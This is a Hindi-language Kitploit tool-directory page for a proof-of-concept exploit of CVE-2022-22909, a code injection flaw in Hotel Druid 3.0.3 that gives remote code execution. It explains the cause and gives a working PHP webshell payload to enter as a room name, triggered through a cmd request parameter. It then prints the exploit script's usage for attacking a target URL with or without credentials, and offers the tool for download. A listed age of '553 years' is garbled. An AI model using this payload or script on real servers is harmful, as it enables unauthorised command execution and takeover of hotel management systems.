Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-22909 — होटल ड्र्यूइड 3.0.3 कोड इंजेक्शन से रिमोट कोड एक्जीक्यूशन | Kitploit
उपकरण/GitHubGitHub/0z09e/cve-2022-22909
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHub0z09e/cve-2022-22909

CVE-2022-22909

होटल ड्र्यूइड 3.0.3 कोड इंजेक्शन से रिमोट कोड एक्जीक्यूशन

रिपॉजिटरी देखें
553 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-22909

विवरण

Hotel Druid v3.0.3 एप्लिकेशन में एक कोड इंजेक्शन भेद्यता पाई गई है, जिसका उपयोग करके एक हमलावर सर्वर पर रिमोट कोड निष्पादित कर सकता है। सफल शोषण के लिए, हमलावर के पास एक नया कमरा जोड़ने का विशेषाधिकार होना चाहिए।

भेद्यता विवरण

यह भेद्यता इसलिए होती है क्योंकि कमरे के नाम /dati/selectappartamenti.php नामक फ़ाइल में डबल कोट्स का उपयोग करके संग्रहीत किए जाते हैं।

root@kitploit:~
<?php 
echo "
<option value=\"Room1\">Room1</option>
<option value=\"Room2\">Room2</option>
<option value=\"Room3\">Room3</option>
";
?>

पेलोड

सफल शोषण करने के लिए, निम्नलिखित पेलोड को कमरे के नाम के रूप में जोड़ें।

root@kitploit:~
{${system($_REQUEST[cmd])}}

नया कमरा जोड़ने के बाद, /dati/selectappartamenti.php पर जाएं और cmd पैरामीटर का उपयोग करके एक कमांड पास करके वेबशेल को ट्रिगर करें।

उपयोग

root@kitploit:~
usage: hotel-druid.py [-h] -t TARGET [-u USERNAME] [-p PASSWORD] [--noauth]

optional arguments:
  -h, --help            show this help message and exit

required arguments:
  -t TARGET, --target TARGET
                        Target URL. Example : http://10.20.30.40/path/to/hoteldruid
  -u USERNAME, --username USERNAME
                        Username
  -p PASSWORD, --password PASSWORD
                        password
  --noauth              If No authentication is required to access the dashboard

उदाहरण

यदि एप्लिकेशन में कोई प्रमाणीकरण नहीं है, तो बिना प्रमाणीकरण के कार्य करने के लिए --noauth फ़्लैग का उपयोग करें।

यदि सर्वर पर प्रमाणीकरण सक्षम है, तो प्रमाणीकरण करने के लिए --username और --password का उपयोग करें।

क्रेडिट

शोधकर्ता और POC लेखक - 0z09e


टूल डाउनलोड करें